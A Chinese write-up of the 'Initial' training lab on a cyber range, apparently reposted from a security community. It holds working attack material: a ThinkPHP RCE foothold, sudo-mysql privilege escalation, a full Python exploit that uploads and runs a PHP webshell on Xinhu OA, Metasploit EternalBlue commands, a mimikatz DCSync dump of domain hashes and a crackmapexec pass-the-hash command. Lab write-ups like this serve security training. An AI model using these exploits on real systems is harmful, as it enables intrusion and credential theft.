春秋云境仿真场景WP:Initial

03Scx122024-05-31文章来源:SecHub网络安全社区


靶场介绍

Initial是一套较为简单的靶场,该靶场较为简单,涉及内网流量代理,frp、proxifier的使用以及横向hash传递攻击,该靶场只有一个flag分布在不同靶机上。

拿到外网shell

开局给ip用nmap扫描端口

开启80,22端口访问发现为thinkphp框架尝试RCE

flag01

进去发现是www-data权限

sudo -l发现mysql可以免密使用

查找第一个flag

sudo mysql -e '\! find / -name flag*'

抓取flag

sudo mysql -e '\! cat /root/flag/flag01.txt'

flag02

ifconfig发现内网网段 172.22.1.0/24

fscan扫描

内网基本信息

172.22.1.2 DC域控

172.22.1.21 MS17-010永恒之蓝

172.22.1.18 信呼OA系统

frp代理

服务器:frps.ini绑定本地5987端口

目标主机:frpc.ini

proxifier代理(地址为服务器ip)

弱口令 admin admin123

信呼OAexp

import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

拿到上传路径getshell

prixifier代理蚁剑流量

拿到flag02

flag03

kali代理流量

vim/etc/proxychains4.conf

hash传递攻击

msf攻击

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

调用mimikatz抓取hash

load kiwi

kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit  # 导出域内所有用户的信息(包括哈希值)

使用crackmapexec攻击访问DC

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}